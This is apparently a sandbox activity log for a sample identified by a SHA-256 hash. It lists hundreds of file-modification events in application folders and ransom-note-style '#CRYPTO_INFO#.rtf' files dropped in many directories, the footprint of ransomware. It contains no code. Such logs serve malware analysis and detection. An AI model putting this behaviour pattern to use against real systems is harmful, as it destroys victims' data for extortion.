8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sr.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\text_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pl_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_wob.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\java.policy 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_hover_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\af_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-uisupport.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\servertool.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\editpdf-tool-view.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner_mini.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\web_documentcloud_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-tool-view.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_LinkNoDrop32x32.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\nub.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\download-btn.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\comment.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-sl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmticmlr.h 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Scan_R_RHP.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-hk_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jps.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_de.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_rename_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\tnameserv.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sk_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\dnsns.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\jconsole.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\StorageConnectors.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner.gif 